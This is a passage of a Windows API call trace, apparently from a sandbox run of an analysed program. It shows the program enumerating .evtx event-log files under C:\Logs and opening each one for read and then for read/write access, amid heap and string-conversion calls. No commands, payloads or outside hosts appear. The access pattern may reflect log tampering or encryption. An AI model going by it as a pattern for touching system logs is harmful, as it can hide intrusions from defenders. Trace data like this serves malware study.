returned 0x71a98 [0087.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0087.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0087.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0087.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0087.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0087.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0087.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0087.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0087.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0087.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0087.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0087.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0087.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0087.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0087.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0087.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0087.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0087.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0087.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0087.269] AreFileApisANSI () returned 1 [0087.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0087.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0087.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 56 [0087.269] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3852b12, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd3852b12, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0087.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0087.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0087.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0087.270] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.270] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.270] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3852b12, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd3852b12, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Shell-Core%4Operational.evtx", cAlternateFileName="MI1C6C~1.EVT")) returned 1 [0087.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0087.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69350 [0087.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0087.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ac8 [0087.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0087.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0087.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0087.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0087.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0087.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0087.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0087.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0087.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0087.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0087.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0087.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0087.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0087.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0087.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0087.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0087.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0087.271] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.271] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.271] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.271] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0087.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0087.271] AreFileApisANSI () returned 1 [0087.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx", lpUsedDefaultChar=0x0) returned 55 [0087.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0087.271] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.271] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0087.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0087.271] AreFileApisANSI () returned 1 [0087.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0087.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75e40 [0087.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 55 [0087.271] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.271] GetFileType (hFile=0x424) returned 0x1 [0087.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0087.272] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.272] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.272] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.272] CloseHandle (hObject=0x424) returned 1 [0087.272] AreFileApisANSI () returned 1 [0087.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0087.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75d50 [0087.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x75d50, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 55 [0087.272] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.272] GetFileType (hFile=0x424) returned 0x1 [0087.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0087.273] CloseHandle (hObject=0x424) returned 1 [0087.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0087.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0087.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0087.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0087.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0087.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0087.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0087.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0087.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0087.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0087.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0087.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0087.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0087.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0087.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0087.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0087.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0087.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0087.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0087.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0087.273] AreFileApisANSI () returned 1 [0087.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0087.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x76110 [0087.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x76110, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 55 [0087.273] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3852b12, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd3852b12, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0087.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0087.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0087.274] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.274] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.274] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97d66c8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97d66c8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-SmbClient%4Connectivity.evtx", cAlternateFileName="MI00FB~1.EVT")) returned 1 [0087.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0087.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68ea0 [0087.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0087.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46978 [0087.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68ea0 | out: hHeap=0x20000) returned 1 [0087.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0087.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0087.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0087.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0087.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0087.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46978 | out: hHeap=0x20000) returned 1 [0087.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0087.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0087.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0087.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0087.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0087.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0087.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0087.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0087.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0087.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0087.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0087.275] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.275] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.275] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.275] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0087.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0087.275] AreFileApisANSI () returned 1 [0087.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx", lpUsedDefaultChar=0x0) returned 55 [0087.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0087.275] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.275] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0087.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0087.275] AreFileApisANSI () returned 1 [0087.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0087.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75cd8 [0087.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 55 [0087.275] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.275] GetFileType (hFile=0x424) returned 0x1 [0087.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0087.276] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.276] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.276] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.276] CloseHandle (hObject=0x424) returned 1 [0087.276] AreFileApisANSI () returned 1 [0087.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0087.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75e40 [0087.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 55 [0087.276] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.277] GetFileType (hFile=0x424) returned 0x1 [0087.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0087.277] CloseHandle (hObject=0x424) returned 1 [0087.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0087.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0087.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0087.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0087.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0087.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0087.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0087.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0087.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0087.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0087.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0087.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0087.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0087.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0087.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0087.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0087.277] 